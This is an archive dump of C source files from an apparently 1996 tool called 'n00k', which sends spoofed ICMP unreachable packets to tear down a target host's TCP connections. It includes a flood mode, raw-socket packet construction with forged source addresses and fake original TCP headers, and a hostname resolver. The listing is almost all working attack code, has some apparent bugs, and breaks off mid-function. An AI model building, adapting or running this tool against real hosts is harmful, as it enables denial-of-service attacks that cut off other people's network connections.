resolve.c100644 765 144 1605 6147444330 11441 0ustar krewlusers/* * resolve.c * * resolves an internet text address into (struct sockaddr_in). * * by crisk, 1995 * * CHANGES: 1. added the RESOLVE_QUIET preprocessor conditions. * */ #include #include #include #include int resolve( const char *name, struct sockaddr_in *addr, int port ) { struct hostent *host; /* clear everything in case I forget something */ bzero(addr,sizeof(struct sockaddr_in)); if (( host = gethostbyname(name) ) == NULL ) { #ifndef RESOLVE_QUIET fprintf(stderr,"unable to resolve host \"%s\" -- ",name); perror(""); #endif return -1; } addr->sin_family = host->h_addrtype; memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length); addr->sin_port = htons(port); return 0; } unsigned long addr_to_ulong(struct sockaddr_in *addr) { return addr->sin_addr.s_addr; } gk.c100644 765 144 14246 6147444346 10417 0ustar krewlusers/* * n00k.c * by crisk * * try to icmp-nuke a host using spoofed icmp-unreachable packets. * * version 0.0.1beta January 1996 * * Possible enhancements: * - Automatic/semi-automatic route tracing * - Source routing IP (in icmp_pkt.c) * */ /* #define ICMP_PKT_DEBUG */ #define RESOLVE_QUIET #include #include #include #include #include #include #include "resolve.c" #include "icmp_pkt.c" #define N00K_VERSION "0.0.1beta" /* GENERAL ROUTINES ------------------------------------------- */ void banner(void) { printf("\nn00k\n"); printf("version %s\n",N00K_VERSION); printf("by crisk.\n\n"); } void usage(const char *progname) { printf("\nusage: \n"); printf("%s [-f] [-q seq] [-p sport] [-d dport] \n\n",progname); printf("\t-f : flood\n"); printf("\t-q : set the bogus-original tcp sequence# to \n"); printf("\t-p : set the bogus-original tcp source port to \n"); printf("\t-d : set the bogus-original tcp dest. port to \n"); printf("\t : unreachable type (0 to 12)\n"); printf("\t : address of fake ICMP packet sender\n"); printf("\t : destination of the unreach message\n"); printf("\t : the faked destination or the orig-tcp packet\n"); printf("\n"); } /* OPTION PARSING -------------------------------------------- */ unsigned char *dest_name; unsigned char *origdest_name; unsigned char *spoof_name = NULL; struct sockaddr_in destaddr; unsigned long origdest_addr; unsigned long dest_addr; unsigned long spoof_addr; unsigned char type; unsigned sport, dport; unsigned long seq; char flood = 0; char *unreachables[] = {"Network unreachable", "Host unreachable", "Protocol unreachable", "Port unreachable", "Fragmantation needed and DF set", "Source route failed", "Network unknown", "Host unknown", "Source host is isolated", "Network administratively unreachable", "Host administratively unreachable", "Network unreachable - type of service", "Host unreachable - type of service"}; int resolve_one(const char *name, unsigned long *addr, const char *desc) { struct sockaddr_in tempaddr; if (resolve(name, &tempaddr,0) == -1) { printf("error: can't resolve the %s.\n",desc); return -1; } *addr = tempaddr.sin_addr.s_addr; return 0; } int resolve_all(const char *origdest, const char *dest, const char *spoof) { if (resolve_one(origdest,&origdest_addr,"origdest address")) return -1; if (resolve_one(dest,&dest_addr,"dest address")) return -1; if (spoof!=NULL) if (resolve_one(spoof,&spoof_addr,"spoof address")) return -1; destaddr.sin_addr.s_addr = dest_addr; destaddr.sin_family = AF_INET; destaddr.sin_port = 0; } void give_info(void) { printf("# target address : %s (%s)\n",dest_name,inet_ntoa(dest_addr)); printf("# original packet target : %s (%s)\n",origdest_name,inet_ntoa(origdest_addr)); printf("# spoof-from address : %s (%s)\n\n",spoof_name,inet_ntoa(spoof_addr)); printf("# bogus TCP source port : %u\n",sport); printf("# bogus TCP dest. port : %u\n",dport); printf("# bogus TCP sequence no. : %lu\n\n",seq); printf("# ICMP unreachable type : %u (%s)\n\n",type,unreachables[type]); } int parse_args(int argc, char *argv[]) { int opt; char *endptr; while ((opt=getopt(argc, argv, "fq:p:d:")) != -1) { switch(opt) { case 'f': flood = 1; break; case 'q': seq = strtoul(optarg,&endptr,10); if (*endptr != '\0') { printf("%s: bad sequence number '%s'\n", argv[0], optarg); return -1; } break; case 'p': sport = strtoul(optarg,&endptr, 10); if (*endptr != '\0') { printf("%s: bad source port number '%s'\n",argv[0],optarg); return -1; } break; case 'd': dport = strtoul(optarg,&endptr, 10); if (*endptr != '\0') { printf("%s: bad dest port number '%s'\n",argv[0],optarg); return -1; } break; case '?': case ':': return -1; break; } } if (optind > argc-2) { printf("%s: missing parameters\n",argv[0]); return -1; } type = strtoul(argv[optind++],&endptr,10); if ((*endptr != '\0') || (type>12)) { printf("%s: bad unreachable type (0-12 only)\n"); return -1; } if ((type == 2) || (type == 3)) { printf("%s: (warning) unreaches of type 2 and 3 should be host-originated\n\n",argv[0]); } spoof_name = argv[optind++]; dest_name = argv[optind++]; origdest_name = argv[optind++]; return 0; } /* MAIN ------------------------------------------------------ */ void main(int argc, char *argv[]) { int s; int floodloop; banner(); if (parse_args(argc,argv)) { usage(argv[0]); return; } resolve_all(origdest_name, dest_name, spoof_name); give_info(); s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (!flood) { if (icmp_unreach_send(s,&destaddr,type,spoof_addr,origdest_addr ,dest_addr,sport,dport,seq) == -1) { printf("%s: error sending packet\n",argv[0]); perror(""); return; } } else { printf("flooding. each dot represents 50 packets\n"); floodloop = 0; while(1) { usleep(2500); if (icmp_unreach_send(s,&destaddr,type,spoof_addr, origdest_addr,dest_addr,sport,dport, seq++) == -1) { printf("%s: error sending packet\n",argv[0]); perror(""); return; } if (!(floodloop = (floodloop+1)%50)) { fprintf(stdout,"."); fflush(stdout); } } } } icmp_pkt.c100644 765 144 7520 6147444601 11573 0ustar krewlusers/* * icmp_pkt.c * by crisk * * routines to send a custom icmp/ip packet over the net. * * CHANGES: changed ttl value on both headers to be possible to such a packet. * */ #define IPHDRSIZE sizeof(struct iphdr) #define ICMPHDRSIZE sizeof(struct icmphdr) #include #include #include #include #include int cize; /* ********** RIPPED CODE START ******************************** */ /* * in_cksum -- * Checksum routine for Internet Protocol family headers (C Version) */ unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } /* ********** RIPPED CODE END ******************************** */ /* * icmp_unreach_send() * builds and sends an ICMP unreachable packet. Since ICMP unreachable packets * contain the IP header + 64 bits of original datagram, we create a bogus * IP header and the first 64 bits of a TCP header (ports and syn). * */ inline int icmp_unreach_send(int socket, struct sockaddr_in *address, unsigned char icmp_code, unsigned long spoof_addr, unsigned long s_addr, unsigned long t_addr, unsigned s_port, unsigned t_port, unsigned long seq) { unsigned char packet[4098]; struct iphdr *ip; struct icmphdr *icmp; struct iphdr *origip; unsigned char *data; int i; ip = (struct iphdr *)packet; icmp = (struct icmphdr *)(packet+IPHDRSIZE); origip = (struct iphdr *)(packet+IPHDRSIZE+ICMPHDRSIZE); data = (char *)(packet+IPHDRSIZE+IPHDRSIZE+ICMPHDRSIZE); memset(packet, 0, 4098); ip->saddr = spoof_addr; ip->daddr = t_addr; ip->version = 4; ip->ihl = 5; ip->ttl = 255-random()%15; ip->protocol = IPPROTO_ICMP; ip->tot_len = htons(IPHDRSIZE + cize + ICMPHDRSIZE + IPHDRSIZE + 8); ip->check = in_cksum(packet,IPHDRSIZE); origip->saddr = t_addr; /* this is the 'original' header. */ origip->daddr = s_addr; origip->version = 4; origip->ihl = 5; origip->ttl = ip->ttl - random()%15; origip->protocol = IPPROTO_TCP; origip->tot_len = IPHDRSIZE + 30; origip->id = random()%69; origip->check = in_cksum(origip,IPHDRSIZE); *((unsigned int *)data) = htons(s_port); *((unsigned int *)(data+2)) = htons(t_port); *((unsigned long *)(data+4)) = htonl(seq); /* 'original IP header + 64 bits (of bogus TCP header)' made. */ icmp->type = ICMP_ECHO; /* should be 3 */ icmp->code = icmp_code; icmp->checksum = in_cksum(icmp,cize+ICMPHDRSIZE+IPHDRSIZE+8); /* the entire ICMP packet it now ready. */ #ifdef ICMP_PKT_DEBUG printf("Packet ready. Dump: \n"); for (i=0;i